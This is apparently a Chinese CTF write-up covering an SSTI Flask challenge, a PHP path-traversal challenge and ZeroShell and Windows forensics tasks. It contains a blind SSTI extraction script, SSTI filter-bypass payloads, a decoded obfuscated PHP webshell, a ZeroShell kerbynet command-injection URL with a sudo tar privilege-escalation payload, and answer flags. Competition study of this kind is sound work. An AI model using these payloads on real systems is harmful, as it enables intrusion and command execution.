第二届国赛

web

Safe_Proxy

源码题目

1
from flask import Flask, request, render_template_stringimport socketimport threadingimport htmlapp = Flask(__name__)@app.route('/', methods="GET"])def source():    with open(__file__, 'r', encoding='utf-8') as f:        return'<pre>'+html.escape(f.read())+'</pre>'@app.route('/', methods=["POST"])def template():    template_code = request.form.get("code")    # 安全过滤    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']    for black in blacklist:        if black in template_code:            return"Forbidden content detected!"    result = render_template_string(template_code)    print(result)    return'ok'if result is not None else'error'class HTTPProxyHandler:    def __init__(self, target_host, target_port):        self.target_host = target_host        self.target_port = target_port    def handle_request(self, client_socket):        try:            request_data = b""            while True:                chunk = client_socket.recv(4096)                request_data += chunk                if len(chunk) < 4096:                    break            if not request_data:                client_socket.close()                return            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:                proxy_socket.connect((self.target_host, self.target_port))                proxy_socket.sendall(request_data)                response_data = b""                while True:                    chunk = proxy_socket.recv(4096)                    if not chunk:                        break                    response_data += chunk            header_end = response_data.rfind(b"\r\n\r\n")            if header_end != -1:                body = response_data[header_end + 4:]            else:                body = response_data            response_body = body            response = b"HTTP/1.1 200 OK\r\n" \            b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \            b"Content-Type: text/html; charset=utf-8\r\n" \            b"\r\n" + response_body            client_socket.sendall(response)        except Exception as e:            print(f"Proxy Error: {e}")        finally:            client_socket.close()def start_proxy_server(host, port, target_host, target_port):    proxy_handler = HTTPProxyHandler(target_host, target_port)    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    server_socket.bind((host, port))    server_socket.listen(100)    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")    try:        while True:            client_socket, addr = server_socket.accept()            print(f"Connection from {addr}")            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))            thread.daemon = True            thread.start()    except KeyboardInterrupt:        print("Shutting down proxy server...")    finally:        server_socket.close()def run_flask_app():    app.run(debug=False, host='127.0.0.1', port=5000)if __name__ == "__main__":    proxy_host = "0.0.0.0"    proxy_port = 5001    target_host = "127.0.0.1"    target_port = 5000    # 安全反代,防止针对响应头的攻击    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))    proxy_thread.daemon = True    proxy_thread.start()    print("Starting Flask app...")    run_flask_app()

ssti没回应,

法一盲注

附上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import base64
import string
import time
from urllib.parse import urlencode

flag=""
part1="{{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('"
part3="')|attr('re''ad')()}}"

url="http://8.147.128.179:22740"
for i in range(1,50):    #["(head -c n /flag | tail -c 1)"  = "j" ] && sleep 2
    for j in  string.printable:
        print(flag)
        part2 = "[ \"$(head -c " + str(i) + " /flag | tail -c 1)\" = \"" + j + "\" ] && sleep 2"
        coco=part1 + part2 + part3
        payload=urlencode(coco)
        print(payload)
        time1=time.time()
        data={
            "code": payload
        }
        requests.post(url,data=data)
        time2=time.time()
        if(time2-time1>1.5):
            flag+=j
            break
""""
{{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses
_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('sleep 10')|attr('re''ad')()}}"""
#if head -c /flag )

法二覆盖

本地调试源码(return’ok’if result is not None else’error’改成return’ok’+result if result is not None else’error’)然后用焚情打本地

覆盖app.py路由

ls / >app.py

1
{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('ls+/>app.py').read()}}

cat /flag >app.py

1
{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('cat+/flag>app.py').read()}}

hello_web

这个当初没做出来,是将../替换成了空,然后…/./用来目录穿越就可以了,

tips文件是一个phpinfo

hackme.php里面是一句话木马

1
<?php highlight_file(__FILE__);$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));?>

eval换成echo输出出来看看

image-20241217120401939

然后再修改一下让他输出

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};
$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
#echo($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
echo "\n";
$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";
echo $YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU)));
?>

看不到,看源代码

image-20241217121115421

出一句话木马,蚁剑连接走disable_function

1
http://eci-2zed8l51f9k8f9ptch3w.cloudeci1.ichunqiu.com/index.php?file=..././hackme.php

zeroshell

题目内容:

小路是一名实习生,接替公司前任网管的工作,一天发现公司网络出口出现了异常的通信,现需要通过回溯出口流量对异常点位(防火墙)进行定位,并确定异常的设备。然后进行深度取证检查(需要获取root权限)。现在需要你从网络攻击数据包中找出漏洞攻击的会话,分析会话编写exp或数据包重放获取防火墙设备管理员权限,查找防火墙设备上安装的木马,然后分析木马外联地址和通信密钥以及木马启动项位置。

1

.从数据包中找出攻击者利用漏洞开展攻击的会话(攻击者执行了一条命令),写出该会话中设置的flag, 结果提交形式:flag{xxxxxxxxx}

(本题附件见于提前下载的加密附件2e9c01da1d333cb8840968689ed3bc57.7z,解压密码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce )

搜base64的flag出包,然后解码referer

image-20241216211305334

2

通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,提取flag文件内容,结果提交形式:flag{xxxxxxxxxx}

这个是cve,第一种方法是在网上找,

1
https://developer.aliyun.com/article/1334090
1
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27

image-20241217122458442

image-20241215141636810

第二种是看流量包,用流量包里面的(就是上边第一问的这个)

image-20241216211604085

1
GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='ps%20-ef'%0A' HTTP/1.1\r\n

3

flag{202.115.89.103}

找出受控机防火墙设备中驻留木马的外联域名或IP地址,结果提交形式:flag{xxxx},如flag{www.abc.com} 或 flag{16.122.33.44}

image-20241217123236823

4

flag为.nginx

请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径

image-20241217133308470

1
2
ls -l /proc/10565/exe 来查找运行文件;找到为.nginx
他还是个隐藏文件,比赛结束之后复现可能没有上边的↑关于外部链接的进程

image-20241217133801037

5

请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥flag{11223344qweasdzxc}

直接xxd就可以观看了

image-20241217134157922

下载方法2

没试过,听说可以

1
wget "http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27cat%20/tmp/.nginx%27%0A%27"

6

请写出驻留木马的启动项,注意写出启动文件的完整路径。结果提交形式:flag{xxxx},如flag{/a/b/c}

在shell中不断查询⽂件,寻找包含”.nginx”字符串的⽂件,最终在/var主⽬录下找到

flag{/var/register/system/startup/scripts/nat/File}

image-20241217134526844

WinFT

某单位网管日常巡检中发现某员工电脑(IP:192.168.116.123)存在异常外连及数据传输行为,随后立即对该电脑进行断网处理,并启动网络安全应急预案进行排查。

(本题附件见于提前下载的加密附件82f13fdc9f7078ba29c4a6dcc65d8859.7z,解压密码为3604e2f3-585a-4972-a867-3a9cc8d34c1d )

_1

受控机木马的回连域名及ip及端口是(示例:flag{xxx.com:127.0.0.1:2333})

法一

文档里面有个病毒exe文件;或者在火绒剑的网络上面也可以看到这个exe毒

点开桌面的火绒剑,再点击网络可以看到远程地址
将文件丢到微步云沙箱https://s.threatbook.com/可以找到回连地址

image-20241215153751935

image-20241215154649242

flag{miscsecure.com:192.168.116.130:443}

法二

分析里面的数据包

image-20241217140021844

_2

受控机启动项中隐藏flag是

Win + R 打开运行对话框。

输入 taskschd.msc,然后按回车键。

里面就这一个东西

image-20241217141035890

1
f^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs=

image-20241217141336747

_3

受控机中驻留的flag是

1

_4

受控源头隐藏的flag是

_5

分析流量,获得压缩包中得到答案

将流量包放入随波逐流,foremost,出来有压缩包

image-20241217143529864

image-20241217143919284

image-20241217143910176

火绒报毒,压缩包损坏,关闭防火墙重新foremost一遍

image-20241217144212905

image-20241217144414546

发现不是这个问题,修复一下压缩包,出flag

image-20241217144734130

_6

通过aes解密得到的flag

sc05_1

近日某公司网络管理员老张在对安全设备进行日常巡检过程中发现防火墙设备日志中产生了1条高危告警,告警IP为134.6.4.12(简称IP1),在监测到可疑网络活动后,老张立刻对磁盘和内存制做了镜像。为考校自己刚收的第一个徒弟李华,老张循序渐进,布置了5道问题。假如你是李华,请你根据提供的防火墙日志、磁盘镜像及内存镜像文件对主机开展网络安全检查分析,并根据5道问题提示,计算并提交相应flag。

(本题附件见于提前下载的加密附件38c44f100028b56e09dc48522385fa95.7z,解压密码为 37af3744-53eb-49fd-854a-f6f79bbf5b1c )

_1

IP1地址首次被请求时间是多久?计算内容如:2020/05/18_19:35:10 提交格式:flag{32位大写MD5值}

文档直接ctrl+f搜索就行了